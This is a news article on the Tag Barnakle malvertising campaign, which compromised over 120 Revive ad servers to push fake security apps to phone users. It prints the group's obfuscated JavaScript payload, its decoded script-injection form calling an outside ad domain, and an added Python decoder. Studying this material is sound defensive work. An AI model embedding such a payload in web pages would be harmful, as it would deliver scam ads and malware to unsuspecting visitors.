Millions of Internet users are targeted by a single malvertising group


Hackers have compromised more than 120 ad servers in the past year in an ongoing campaign that displays malicious ads on tens of millions, if not hundreds of millions, of devices as their owners visit sites that, by all appearances, are benign.

Malvertising is the practice of serving malicious ads to people as they visit trusted websites. The ads carry JavaScript that surreptitiously exploits software defects or tries to trick visitors into installing an unsafe application, paying fraudulent computer-support fees, or taking other harmful actions. The scammers behind this scourge of the Internet usually present themselves as buyers and pay ad delivery networks to display the malicious ads on individual sites.

Going after the jugular

Infiltrating the advertising ecosystem by posing as a legitimate buyer requires resources. Scammers first have to invest time learning how the market works and then build an entity with a trustworthy reputation. The approach also costs money, because ad space has to be bought before malicious ads can run in it. None of that is the technique used by a malvertising group that security company Confiant calls Tag Barnakle.

“On the other hand, Tag Barnakle is able to completely circumvent this initial hurdle by going straight to the jugular – the mass compromise of the ad delivery infrastructure,” Confiant researcher Eliya Stein wrote in a blog post on Monday. “They can probably boast of an ROI [return on investment] which would eclipse rivals because they don’t have to spend any money to run advertising campaigns.”

In the last year, Tag Barnakle has infected more than 120 servers running Revive, an open source application for organizations that want to run their own ad server rather than rely on a third-party service. That is twice the number of infected Revive servers Confiant found last year.

After compromising an ad server, Tag Barnakle loads a malicious payload onto it. To evade detection, the group uses client-side fingerprinting to ensure that only a small number of the most attractive targets receive the harmful ads. The servers that deliver a secondary payload to those targets also use cloaking techniques so that they, too, fly under the radar.

Here is an overview (diagram; image credit: Confiant).

When Confiant reported on Tag Barnakle last year, it found that the group had infected about 60 Revive servers. That campaign allowed the group to distribute ads on more than 360 web properties. The ads pushed fake Adobe Flash updates that installed malware on desktop computers when run.

This time, Tag Barnakle is targeting both iPhone and Android users. Websites that receive an ad through a compromised server serve heavily obfuscated JavaScript that determines whether the visitor is using an iPhone or an Android device.

https://galikos[.]com/ci.html?mAn8iynQtt=SW50ZWwgSqW5jPngyMEludGVsKFIpIElyaXMoVE0OIFBsdXMgR3J3cGhpY37gNjU1

If visitors pass the fingerprinting and other checks, they receive a secondary payload that looks like this:

var _0x209b=["charCodeAt","fromCharCode","atob","length"];(function(_0x58f22e,_0x209b77){var _0x3a54d6=function(_0x562d16){while(--_0x562d16){_0x58f22e["push"](_0x58f22e["shift"]());}};_0x3a54d6(++_0x209b77);}(_0x209b,0x1d9));var _0x3a54=function(_0x58f22e,_0x209b77){_0x58f22e=_0x58f22e-0x0;var _0x3a54d6=_0x209b[_0x58f22e];return _0x3a54d6;};function pr7IbU3HZp6(_0x2df7f1,_0x4ed28f){var _0x40b1c0=[],_0xfa98e6=0x0,_0x1d2d3f,_0x4daddb="";for(var _0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0x40b1c0[_0xaefdd9]=_0xaefdd9;}for(_0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9]+_0x4ed28f["charCodeAt"](_0xaefdd9%_0x4ed28f[_0x3a54("0x2")]))%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f;}_0xaefdd9=0x0,_0xfa98e6=0x0;for(var _0x2bdf25=0x0;_0x2bdf25<_0x2df7f1[_0x3a54("0x2")];_0x2bdf25++){_0xaefdd9=(_0xaefdd9+0x1)%0x100,_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9])%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f,_0x4daddb+=String[_0x3a54("0x0")](_0x2df7f1[_0x3a54("0x3")](_0x2bdf25)^_0x40b1c0[(_0x40b1c0[_0xaefdd9]+_0x40b1c0[_0xfa98e6])%0x100]);}return _0x4daddb;}function fCp5tRneHK(_0x2deb18){var _0x3d61b2="";try{_0x3d61b2=window[_0x3a54("0x1")](_0x2deb18);}catch(_0x4b0a86){}return _0x3d61b2;};var qIxFjKSY6BVD = ["Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/","DWuTZUTZO+sQsXe8Ng==","j6nfa3m","Y0d83rLB","Y0F69rbB65Ug6d9y","gYTeJruwFuW","n3j6Vw==","n2TyRkwJoyYulkipRrYr","dFCGtizS","yPnc","2vvPcUEpsBZhStE=","gfDZYmHUEBxRWrw4M"];var aBdDGL0KZhomY5Zl = document[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[1]), qIxFjKSY6BVD[2])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[3]), qIxFjKSY6BVD[5]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[6]), qIxFjKSY6BVD[8]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[7]), 
qIxFjKSY6BVD[8]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[9]), qIxFjKSY6BVD[11]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[0]), qIxFjKSY6BVD[2]));var bundle = document.body||document.documentElement;bundle[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[10]), qIxFjKSY6BVD[11])](aBdDGL0KZhomY5Zl);

When decoded, the payload is:

var aBdDGL0KZhomY5Zl = document["createElement"]("script");
// the obfuscated form passes two arguments to this call: the attribute name and its value
aBdDGL0KZhomY5Zl["setAttribute"]("type", "text/javascript");
aBdDGL0KZhomY5Zl["setAttribute"]("src", "https://overgalladean[.]com/apu.php?zoneid=2721667");
// final call in the obfuscated blob: attach the new script element to the page so it loads
(document.body || document.documentElement)["appendChild"](aBdDGL0KZhomY5Zl);
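As an added illustration of how an analyst recovers those strings (this is not code from the article or from Confiant): in the blob above, pr7IbU3HZp6 is a textbook RC4 (key schedule followed by the keystream loop), fCp5tRneHK is window.atob, and every call pairs a base64 ciphertext from the qIxFjKSY6BVD table with a raw key string from the same table. The Python below re-implements that decode over the table as it appears on the page and adds a keystream-reuse check: because one key is used for several strings, the XOR of two ciphertexts equals the XOR of their plaintexts, which lets an analyst confirm a guessed string (or reject a misspelling such as "setAtrribute") without running RC4 at all. The call order and the test vectors are the only things assumed beyond the page.

```python
"""Decode the RC4/base64 string table used by the Tag Barnakle secondary payload."""
import base64

# String table copied from the obfuscated payload on the page (qIxFjKSY6BVD).
STRING_TABLE = [
    "Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/",
    "DWuTZUTZO+sQsXe8Ng==",
    "j6nfa3m",
    "Y0d83rLB",
    "Y0F69rbB65Ug6d9y",
    "gYTeJruwFuW",
    "n3j6Vw==",
    "n2TyRkwJoyYulkipRrYr",
    "dFCGtizS",
    "yPnc",
    "2vvPcUEpsBZhStE=",
    "gfDZYmHUEBxRWrw4M",
]

# (ciphertext index, key index) pairs in the order the payload evaluates them:
# pr7IbU3HZp6(fCp5tRneHK(t[a]), t[b])  ==  rc4(key=t[b], data=base64decode(t[a]))
CALLS = [(1, 2), (3, 5), (4, 5), (6, 8), (7, 8), (9, 11), (10, 11), (0, 2)]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), byte for byte what pr7IbU3HZp6 does."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation, XORed in
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def decode_entry(table, ct_index, key_index):
    ciphertext = base64.b64decode(table[ct_index])   # fCp5tRneHK = window.atob
    key = table[key_index].encode("latin-1")         # key used raw, via charCodeAt
    return rc4(key, ciphertext).decode("latin-1")    # String.fromCharCode per byte


def decode_table(table=STRING_TABLE, calls=CALLS):
    """Return (ciphertext index, key index, plaintext) for each call in the payload."""
    return [(a, b, decode_entry(table, a, b)) for a, b in calls]


def keystream_reuse_check(table, idx_a, idx_b, guess_a, guess_b):
    """Two strings encrypted under the same key share an RC4 keystream prefix,
    so ct_a XOR ct_b == pt_a XOR pt_b over the common length. True if the two
    guessed plaintexts are consistent with the ciphertexts, with no RC4 needed."""
    ct_a = base64.b64decode(table[idx_a])
    ct_b = base64.b64decode(table[idx_b])
    n = min(len(ct_a), len(ct_b), len(guess_a), len(guess_b))
    ct_xor = bytes(x ^ y for x, y in zip(ct_a[:n], ct_b[:n]))
    pt_xor = bytes(x ^ y for x, y in zip(guess_a.encode()[:n], guess_b.encode()[:n]))
    return ct_xor == pt_xor


if __name__ == "__main__":
    for a, b, text in decode_table():
        print(f"table[{a}] under key table[{b}] -> {text!r}")
    # Cheap sanity check an analyst can run before trusting the decoder at all.
    print("script/setAttribute consistent:",
          keystream_reuse_check(STRING_TABLE, 3, 4, "script", "setAttribute"))
```

Running the script prints the DOM method names, the attribute names and the script URL in the order the payload uses them; the reuse check is useful in triage when the decoder itself is still being written, and it is why the misspelled "setAtrribute" in some write-ups cannot be what the blob decodes to.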

As the decoded code shows, the ads are served from overgalladean[.]com, a domain that Confiant said is used by PropellerAds, an advertising network that security firms, including Malwarebytes, have long documented as malicious.

When Confiant researchers followed the PropellerAds click tracker on the device types Tag Barnakle targets, they saw ads like this (screenshot; image credit: Confiant).

Tens of millions served

The ads primarily push app store listings for fake security, safety, or VPN apps that carry hidden subscription costs or "siphon traffic for harmful purposes."

Because ad servers are frequently integrated with multiple ad exchanges, the ads can spread widely, across hundreds and possibly thousands of individual websites. Confiant does not know how many end users have been exposed to the ads, but the company believes the number is large.

"If we consider the fact that some of these media companies have [Revive] integrations with cutting-edge programmatic advertising platforms, Tag Barnakle's reach is easily in the tens, if not hundreds, of millions of devices," Stein wrote. "This is a conservative estimate that takes into account the fact that it cookies its victims to reveal the low-frequency payload, which could slow down the detection of their presence."
